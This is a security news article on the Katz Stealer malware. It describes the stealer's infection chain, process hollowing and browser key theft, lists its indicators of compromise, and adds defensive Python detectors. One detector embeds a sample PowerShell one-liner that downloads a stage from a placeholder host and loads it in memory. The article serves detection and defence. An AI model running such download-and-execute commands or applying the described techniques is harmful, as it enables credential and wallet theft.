Katz Stealer Malware Targets Major Browsers to Steal Credentials

Hitesh Suthar

Software Developer

May 27, 2025 4 min read

Katz Stealer Targets Chrome, Edge, Brave, and Firefox to Steal Login Credentials


Katz Stealer has emerged as a potent credential-stealing malware-as-a-service, targeting popular web browsers such as Chrome, Edge, Brave, and Firefox. This malware conducts extensive system reconnaissance and data theft by extracting saved passwords, cookies, and session tokens from these browsers. It also compromises cryptocurrency wallets, communication platforms like Discord and Telegram, and email clients such as Outlook.

The infection chain leverages phishing emails, fake software downloads, and malicious ads to infiltrate systems. Katz Stealer’s sophisticated delivery method begins with malicious JavaScript hidden within gzip files.


Once executed, this script downloads an obfuscated, base64-encoded PowerShell script, which in turn retrieves a .NET-based loader. The loader injects the stealer into a legitimate process such as MSBuild.exe using process hollowing: the host process is started suspended, its original image is unmapped from memory, and the malicious image is written in its place before the main thread resumes, so the stealer runs under a trusted process name. Katz Stealer also employs evasion mechanisms including geofencing, virtual machine detection, and sandbox evasion.

A Sophisticated Malware-as-a-Service Threat

Once active, Katz Stealer establishes a persistent TCP connection to its command and control (C2) server, downloads further payloads, and injects them into browser processes. This is how it gets around Chrome’s app-bound encryption: the app-bound key stored in the browser’s Local State file is meant to be usable only by Chrome itself, so the stealer recovers it from inside the browser process and writes the decrypted key to disk as plaintext (the decrypted_chrome_key.txt file in the IOCs below) for exfiltration.

The malware’s reach extends to Firefox, where it targets profile files such as cookies.sqlite and logins.json, and to Discord, which it hijacks by injecting malicious code into the client’s app.asar archive to gain remote execution. Katz Stealer also targets cryptocurrency wallets such as Exodus and Bitcoin Core, copying private keys and seed phrases to temporary directories before uploading them to attacker-controlled servers.

Detection opportunities include network traffic analysis for the anomalous User-Agent string listed below (a stock Chrome string with a trailing katz-ontop token) and monitoring for unusual process behaviour, such as a non-browser process reading browser profile files.

Indicators of Compromise (IOCs)

C2 Addresses: 185.107.74.40, 31.177.109.39, twist2katz.com, pub-ce02802067934e0eb072f69bf6427bf6.r2.dev
Related Domains: katz-stealer.com, katzstealer.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop
Filenames: \AppData\Local\Temp\katz_ontop.dll, \AppData\Local\Temp\received_dll.dll, \AppData\Roaming\decrypted_chrome_key.txt
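As an added example (not code from the original article or from any of the researchers it cites), the following Python snippet applies the network indicators above to proxy log lines. The log layout (tab-separated timestamp, client IP, method, URL, status, User-Agent) and the sample lines are constructed for the example; the C2 addresses, domains and User-Agent marker are the ones listed above. The last sample line is a look-alike host that must not match, which is why domain matching is done on the full label boundary rather than with a substring test.

```python
from urllib.parse import urlsplit

# Network indicators from the IOC list above.
C2_IPS = {"185.107.74.40", "31.177.109.39"}
C2_DOMAINS = {
    "twist2katz.com",
    "pub-ce02802067934e0eb072f69bf6427bf6.r2.dev",
    "katz-stealer.com",
    "katzstealer.com",
}
# The only thing separating the malware's User-Agent from a stock Chrome one
# is the trailing token, so match on that rather than on the whole string.
UA_MARKER = "katz-ontop"

# Constructed proxy log (assumed layout): timestamp, client, method, URL, status,
# User-Agent, tab-separated. Lines 2-4 are the ones a defender should see flagged;
# line 5 is a look-alike domain that must stay clean.
SAMPLE_LOG = "\n".join([
    "2025-05-27T10:00:01Z\t10.0.0.5\tGET\thttps://www.example.com/\t200\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
    "2025-05-27T10:00:02Z\t10.0.0.7\tGET\thttps://www.example.com/\t200\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop",
    "2025-05-27T10:00:03Z\t10.0.0.7\tCONNECT\thttps://185.107.74.40:443/\t200\t-",
    "2025-05-27T10:00:04Z\t10.0.0.7\tGET\thttps://pub-ce02802067934e0eb072f69bf6427bf6.r2.dev/payload.bin\t200\t-",
    "2025-05-27T10:00:05Z\t10.0.0.9\tGET\thttps://twist2katz.com.example.net/\t200\t-",
])


def host_is_c2(host: str) -> bool:
    """True if host is a listed C2 IP, a listed domain, or a subdomain of one."""
    host = host.lower().rstrip(".")
    if host in C2_IPS or host in C2_DOMAINS:
        return True
    # Label-boundary suffix match: catches cdn.twist2katz.com, not twist2katz.com.example.net
    return any(host.endswith("." + d) for d in C2_DOMAINS)


def check_line(line: str) -> list[str]:
    """Return the reasons a single log line is suspicious (empty list if none)."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        return []  # malformed line; a real pipeline would count these separately
    _ts, _client, _method, url, _status, user_agent = fields
    host = urlsplit(url).hostname or ""
    reasons = []
    if UA_MARKER in user_agent:
        reasons.append(f"User-Agent carries '{UA_MARKER}' marker")
    if host_is_c2(host):
        reasons.append(f"connection to listed C2 host {host}")
    return reasons


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Scan a whole log; return (line number, client IP, reasons) for each hit."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        reasons = check_line(line)
        if reasons:
            hits.append((number, line.split("\t")[1], reasons))
    return hits


if __name__ == "__main__":
    for number, client, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number} client {client}: " + "; ".join(reasons))
```

Matching on the katz-ontop token alone is deliberate: the rest of the string is a current Chrome User-Agent, so a full-string match would break on the next browser version while the appended token is the part the operator controls.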

Katz Stealer Malware Hits 78+ Chromium and Gecko-Based Browsers


Katz Stealer is now a significant threat to users of Chromium and Gecko-based browsers, extracting sensitive data from over 78 browser variants. Developed in C and Assembly for lightweight performance, the malware targets credentials, cookies, autofill data, CVV2 codes, OAuth tokens, cryptocurrency wallets, and messaging platforms like Discord and Telegram.

The malware includes a customizable build panel with anti-VM safeguards and a web-based command-and-control interface for stolen data management. Katz Stealer's modular design allows attackers to deploy lighter versions for broad campaigns or equipped variants for high-value targets.

Anti-Detection Mechanisms

The operational flexibility stems from the customizable build panel, allowing attackers to tailor payloads. The malware can enable anti-VM checks to hinder analysis in sandboxed environments and activate privacy-focused features to minimize detection by endpoint protection tools.

Analysts warn that this enterprise-grade C2 infrastructure lowers the barrier for less technically skilled threat actors, potentially increasing the malware’s proliferation.

Implications for Cybersecurity Defenses

The emergence of Katz Stealer underscores the escalating arms race between malware developers and security teams. Its use of low-level languages complicates reverse-engineering efforts, emphasizing the need for organizations relying on Chromium or Gecko-based browsers to monitor for anomalous cookie exports or unauthorized OAuth token usage.

Defensive recommendations include enforcing multi-factor authentication for OAuth-integrated services and segmenting cryptocurrency wallet access from general browsing activities.

Defenders should scrutinize processes that interact with browser profile directories for unauthorized access, but no specific mitigation tools are confirmed yet. Behavior-based detection that looks for the memory operations characteristic of process hollowing (a child process created suspended, its image unmapped and rewritten before the main thread resumes) may help identify infiltration attempts.
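As an added illustration of the recommendation above (not code from the article or from Nextron Systems), the following Python snippet evaluates file-access events of the kind an EDR or Sysmon pipeline produces and flags non-browser processes that touch the profile files named in this article, writes to Discord's app.asar, and writes of the IOC filenames listed earlier. The event format, the allow-listed process names and the sample events are assumptions made for the example; MSBuild.exe appears in the samples because the article names it as the hollowed host, and an allow-list keyed on the browser binaries catches the stealer regardless of which process it hides in.

```python
import ntpath

# Processes that legitimately open their own profile files (assumed allow-list).
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
# Chromium profile artifacts named in the article: "Local State" holds the
# app-bound key, "Login Data" and "Cookies" hold credentials and cookies.
CHROMIUM_ARTIFACTS = {"local state", "login data", "cookies"}
FIREFOX_ARTIFACTS = {"cookies.sqlite", "logins.json"}
# Filenames from the IOC list earlier on the page.
IOC_FILENAMES = {"katz_ontop.dll", "received_dll.dll", "decrypted_chrome_key.txt"}

# Constructed sample events: {process, action, path}. Event 0 and 5 are normal
# browser activity; events 1-4 model the stealer running inside MSBuild.exe.
SAMPLE_EVENTS = [
    {"process": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "action": "read",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "action": "read",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"process": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "action": "write",
     "path": r"C:\Users\alice\AppData\Roaming\decrypted_chrome_key.txt"},
    {"process": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "action": "read",
     "path": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\cookies.sqlite"},
    {"process": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "action": "write",
     "path": r"C:\Users\alice\AppData\Local\Discord\app-1.0.9000\resources\app.asar"},
    {"process": r"C:\Program Files\Mozilla Firefox\firefox.exe", "action": "read",
     "path": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\logins.json"},
]


def classify_event(event: dict) -> list[str]:
    """Return findings for one file-access event (empty list if benign)."""
    process = ntpath.basename(event["process"]).lower()  # ntpath handles backslashes on any OS
    path = event["path"]
    lowered = path.lower()
    name = ntpath.basename(path).lower()
    findings = []

    if name in IOC_FILENAMES and event["action"] == "write":
        findings.append(f"{process} wrote known Katz Stealer artifact {name}")

    if process not in BROWSER_PROCESSES:
        # Chromium keeps every profile under "User Data"; Firefox under "Profiles".
        if "\\user data\\" in lowered and name in CHROMIUM_ARTIFACTS:
            findings.append(f"non-browser process {process} accessed Chromium profile file {name}")
        if "\\profiles\\" in lowered and name in FIREFOX_ARTIFACTS:
            findings.append(f"non-browser process {process} accessed Firefox profile file {name}")

    # Discord hijack: the article describes code being injected into app.asar.
    if name == "app.asar" and event["action"] == "write" and "\\discord\\" in lowered:
        findings.append(f"{process} modified Discord app.asar")

    return findings


def scan_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, findings) for every event with at least one finding."""
    hits = []
    for index, event in enumerate(events):
        findings = classify_event(event)
        if findings:
            hits.append((index, findings))
    return hits


if __name__ == "__main__":
    for index, findings in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(findings))
```

Discord's own updater also rewrites app.asar, so in production the last rule would be tuned on the writing process's signer or path; the point of the example is that the profile-file rules need no tuning at all, because only the browsers themselves have any business opening those files.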

Katz Stealer Attacking Chrome, Edge, Brave & Firefox to Steal Login Details


Katz Stealer represents a significant threat to users of popular web browsers, utilizing advanced capabilities to bypass modern security protections. This malware targets Chrome, Microsoft Edge, Brave, and Firefox, employing a multi-layered attack strategy that combines social engineering with evasion techniques to steal sensitive authentication data.

The malware successfully circumvents Chrome’s App-Bound Encryption technology, extracting decryption keys directly from browser processes. Katz Stealer also targets gaming platforms like Steam, communication tools such as Discord and Telegram, email clients like Outlook, and various cryptocurrency wallet applications.

Nextron Systems researchers identified this threat through comprehensive analysis of its infection mechanisms and behavioral patterns. Katz Stealer employs advanced anti-analysis techniques, including geofencing, virtual machine detection, and sandbox evasion strategies.

The distribution strategy uses everyday online activities as attack vectors, with threat actors concealing malicious payloads within phishing emails, fake software downloads, and malicious advertisements.

Multi-Stage Infection Chain Analysis

The infection mechanism demonstrates remarkable sophistication in payload delivery.

Katz Stealer’s Infection Chain (Source – Nextron Systems)

The attack begins with heavily obfuscated JavaScript concealed within GZIP files, serving as the initial entry point. The second stage runs a base64-encoded PowerShell script that downloads additional components, launched with a hidden window (PowerShell’s -WindowStyle Hidden switch) so that no console is shown to the user.

Once the payload has been extracted, the malware uses .NET Reflection (typically Assembly.Load on a byte array) to load and execute the next stage directly in memory, so that stage is never written to disk where file-based scanning would see it. The final payload is injected into a legitimate MSBuild.exe process through process hollowing.
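The chain above leaves a recognisable trail in process-creation telemetry (Sysmon event 1 or Windows event 4688): a script host starting PowerShell with a hidden window and an encoded command, and PowerShell then starting MSBuild.exe. As an added example (not code from the article or from Nextron Systems), the following Python snippet decodes the -EncodedCommand payload and scores such events. The event format, the assumption that the first-stage JavaScript runs under Windows Script Host (wscript.exe/cscript.exe), the placeholder download host and the sample events are all constructed for the example; the encoded command is built by the block itself so it is exactly what PowerShell would accept.

```python
import base64
import re

# Hypothetical one-liner for the constructed sample. It does what the article
# describes (download a stage, load it via .NET Reflection) against a placeholder
# host; it is not a real Katz Stealer command line.
SAMPLE_SCRIPT = (
    "$b=(New-Object Net.WebClient).DownloadData('http://example.invalid/stage2');"
    "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"
)

# PowerShell accepts unambiguous prefixes of its switches, so -e, -ec, -enc and
# -EncodedCommand are equivalent, as are -w, -win and -WindowStyle.
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)[-/](?:w|win|windowstyle)\s+hidden\b")
# Substrings in the decoded script that indicate download-and-reflect behaviour.
REFLECT_MARKERS = ("reflection.assembly", "downloaddata", "downloadstring", "frombase64string")
# Assumption for the example: the first-stage JavaScript runs under Windows Script Host.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or odd byte count
        return None


# Constructed sample events: {parent, image, cmdline}. Event 0 is an admin script,
# event 1 the second stage, event 2 the MSBuild host, event 3 a normal build.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + encode_command(SAMPLE_SCRIPT)},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    {"parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe proj.csproj"},
]


def analyze_process_event(event: dict) -> list[str]:
    """Findings for one process-creation event (empty list if nothing stands out)."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    cmdline = event["cmdline"]
    findings = []

    if image in POWERSHELL:
        if HIDDEN_RE.search(cmdline):
            findings.append("PowerShell started with a hidden window")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append("encoded command decoded: " + decoded[:60])
            hits = [m for m in REFLECT_MARKERS if m in decoded.lower()]
            if hits:
                findings.append("decoded script downloads/reflectively loads code: " + ", ".join(hits))
        if parent in SCRIPT_HOSTS:
            findings.append(f"PowerShell spawned by script host {parent}")

    # The article names MSBuild.exe as the process-hollowing host.
    if image == "msbuild.exe" and parent in POWERSHELL:
        findings.append("MSBuild.exe spawned by PowerShell (candidate hollowing host)")

    return findings


def scan_process_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, findings) for every event with at least one finding."""
    hits = []
    for index, event in enumerate(events):
        findings = analyze_process_event(event)
        if findings:
            hits.append((index, findings))
    return hits


if __name__ == "__main__":
    for index, findings in scan_process_events(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(findings))
```

Decoding the command line rather than just flagging -enc matters because encoded PowerShell is common in legitimate automation; it is the decoded content (a download followed by a reflective Assembly.Load) combined with the hidden window and the script-host parent that separates this chain from routine use.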
